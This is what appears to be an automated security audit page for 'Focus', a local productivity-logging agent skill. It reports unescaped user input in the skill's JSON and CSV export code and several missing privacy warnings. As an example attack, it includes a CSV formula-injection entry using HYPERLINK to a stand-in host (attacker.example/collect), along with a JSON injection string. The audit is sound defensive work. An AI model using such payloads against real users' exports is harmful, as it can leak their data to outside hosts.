Back to skill

Security audit

Focus

Security checks for vulnerabilities and agentic risk

Overview

Focus is a local productivity logger whose main risks are expected plaintext note storage and imperfect export formatting, not hidden or malicious behavior.

Install only if you are comfortable with productivity entries being stored locally in plaintext at ~/.local/share/focus. Do not store passwords, tokens, or highly sensitive notes, and treat exported files as sensitive because they may contain the full saved history.

Vulnerability Patterns
  • Insecure Skill Coding PracticesFinds exploitable flaws such as hardcoded secrets or command injection
  • Skill Instruction HijackingAlters the agent's session goals or safety constraints when the skill loads
  • Agent Memory PoisoningWrites attacker-controlled rules into memory that affect later sessions
  • Remote Payload Retrieval and ExecutionFetches external code whose behavior can change after review
  • Embedded Malicious CodeShips malicious scripts inside the skill and executes them locally
Findings (1)

T09 · Insecure Skill Coding Practices

Warning
Location
scripts/script.sh:68
Finding

Unescaped User Input in JSON and CSV Exports

Content
View full analysis
> "$out" done < "$f" done echo "\n]" >> "$out" ;; csv) echo "type,time,value" > "$out" for f in "$DATA_DIR"/*.log; do [ -f "$f" ] || continue local name=$(basename "$f" .log) while IFS='|' read -r ts val; do echo "$name,$ts,$val" >> "$out"; done < "$f" ``` ### Technical Analysis The export implementation directly interpolates log data into JSON and CSV output without applying the escaping rules required by either format. The `val` variable originates from user-controlled entry text stored by commands such as `focus add`, `focus plan`, and `focus track`. For JSON output, quotation marks, backslashes, control characters, and embedded newlines are not JSON-escaped. A value such as: ```text "} , {"type":"injected","time":"attacker","value":"record ``` can terminate the intended value and inject additional JSON structure or render the exported document invalid. For CSV output, fields are not enclosed in quotes and embedded quotes, commas, carriage returns, and newlines are not escaped. This permits record and column injection. Additionally, a value beginning with `=`, `+`, `-`, or `@` may be interpreted as a formula when the CSV file is opened in spreadsheet software. The exact behavior and available capabilities depend on the spreadsheet application's security settings. This issue does not cause shell command execution inside the Focus script itself. Exploitation requires a downstream parser, application, or user to consume the generated export. ### Attack Path 1. An attacker supplies or convinces a user to store a crafted entry, for example: ```bash focus add '=HYPERLINK("https://attacker.example/collect","Open report ...[truncated 1453 chars]
Remediation
View remediation
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
91% confidence
Finding

The script persistently stores all user-provided entries under ~/.local/share/focus and appends them to history.log without any upfront notice, consent, retention control, or sensitivity warning. Because this tool is explicitly designed for productivity notes, users may enter sensitive personal, work, or credential-adjacent information that then remains on disk in plaintext and may be readable by other local processes, backups, or shared-account users.

Content

No source excerpt is available for this finding.

Missing User Warnings

Medium
Category
Not specified by scanner
Confidence
89% confidence
Finding

The export function aggregates all logged entries into json/csv/txt files on disk without warning the user that potentially sensitive notes are being copied into a new file, broadening exposure and making accidental sharing more likely. The productivity context increases risk because exports may contain a consolidated history of plans, reminders, reviews, and other potentially sensitive personal or workplace information in plaintext.

Content

No source excerpt is available for this finding.

Missing User Warnings

Low
Category
Not specified by scanner
Confidence
95% confidence
Finding

The skill states that it performs automatic history and activity logging, but the description does not present this as a clear privacy warning or obtain informed user consent before use. This can cause users to unknowingly store sensitive productivity notes, plans, or activity data on disk, increasing privacy and local data exposure risk on shared or managed systems.

Content

No source excerpt is available for this finding.

Static analysis

No suspicious patterns detected.